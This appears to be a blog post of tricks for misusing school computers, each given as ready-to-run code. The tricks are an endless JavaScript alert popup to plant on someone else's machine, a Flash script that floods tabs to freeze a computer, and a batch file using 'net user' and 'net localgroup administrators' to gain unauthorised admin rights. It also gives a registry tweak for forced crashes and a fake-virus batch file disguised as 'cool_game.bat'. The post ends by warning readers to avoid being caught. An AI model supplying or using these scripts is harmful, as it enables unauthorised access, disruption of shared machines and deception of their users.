I know it has been a while after my last article, so sorry guys for that.
Today I will be happy to tell you that my article is all about School computers! Because they're just too easy to hack and do fun stuff with, especially because teachers are just so incompetent with technology sometimes.
1. Be a Javascript Troller
There are so many types of crazy and annoying things you can probably do with Javascript, and all you need in order to do some of these things is just a text editor and a web browser. So, for this script, open up Notepad or something of the like and type the following:
<html>
<head>
<title>Lol i troll u</title>
<script type="text/javascript">
function troll() {
alert('Lol i trolled u!');
troll();
}
</script>
</head>
<body onLoad="troll()">
<center>
<img src="http://upload.wikimedia.org/wikipedia/en/7/78/Trollface.svg" />
</center>
</body>
</html>
So what do you do with this code? Save it as trolled.html or anything else as long as it ends with .html and not .txt. Copy it onto someone else's computer when they're not looking (i.e. put it on a USB stick and open it up from there.) Then, quickly leave the vicinity before they look back.
So, what does this code do? Basically, it creates a function called troll() which makes a popup and then does troll() again, and that new troll() makes a popup and calls troll(), and that new troll makes a popup that calls troll()..... It's a never-ending circle. Once you click "ok", a new alert pops up. The only way out is to force-quit the web browser (open up the Task Manager and end a process for Windows, or just force-quit normally for Mac.) As an added bonus, the page has the trollface as a background.
2. Crash a Computer using Flash and Google
Yep, it's actually quite easy to do. Open up a new flash document. Open up the Actions panel for the stage of the first frame. If it's in Actionscript 2, write the following:
onEnterFrame = function ()
{
getURL("http://www.google.com", "_blank");
}
Or if it's actionscript 3 write the following:
function openGoogle(e:Event):void
{
navigateToURL("http://www.google.com", "_blank");
}
stage.addEventListener(Event.ENTER_FRAME, openGoogle);
Press Control-Enter when you're ready to crash your computer. What this does is repeatedly open up new tabs of Google. But it opens so many Google tabs every second that after maybe 20-30 seconds your computer will barely be able to respond to you mouse clicks or even mouse movements. Usually, any attempt to stop it will result in processing overload and cause the computer to freeze. The only real way to stop this is to force-quit BOTH flash.exe and iexplorer.exe. Some teachers may know enough to do this, but might accidentally close explorer.exe
3. Promote your Account
Want to be an administrator? No big deal. Open up Notepad. Type in the following:
@echo off
net user USERNAME PASSWORD /add
goto admin
:admin
@echo off
net localgroup administrators USERNAME /add
pause
Although, you have to replace USERNAME with whatever your username is and PASSWORD with a password. Save the file as n00b.bat or as anything else .bat and NOT .txt. Navigate to the directory where you saved the file, and double-click it to run it. Once that's done, log out, then log back in again. You're now an admin for that specific machine!
Note: This may or may not work if they have disabled the command prompt. If they have, sorry folks, but you're out of luck for this one. You can still become an admin by using various software if you're really desperate.
4. Do Something Neat with the Scroll-Lock Key
It's usually useless... UNTIL NOW! Note: This only works on XP machines.
1. Start > Run. Type in "regedit" and click "OK".
2. Go to KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters by using the dropdowns in the sidebar.
3. Edit > New > DWORD Value. Set the name to CrashOnCtrlScroll.
4. Right-click on this newly created value and click on Modify
5. Enter the number 1 in the Value data field and click on OK.
6. Close regedit and reboot your system.
7. Now you can blue screen (crash) your system by holding the right CTRL key and pressing "Scroll Lock" twice. It's bluescreeneriffic!
5. Write a Virus that Doesn't Do Anything but Scares Your Friends
Open notepad. Type this:
@echo off
echo OMFG YOU GOT A VIRUS.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that. Pressing a key made the virus delete your account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting.......
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A TROLLED F***.
pause
Save this as cool_game.bat or anything else that ends in .bat and sounds like it's NOT a virus. This way, you can give a friend the file, and make them run it and then scare them silly. It's pretty entertaining.
Warning !!!
Seriously, don't do these if someone is watching. They may be fun, but it's easy for someone to monitor your account. If they catch you, well, then you're screwed.




0 comments:
Post a Comment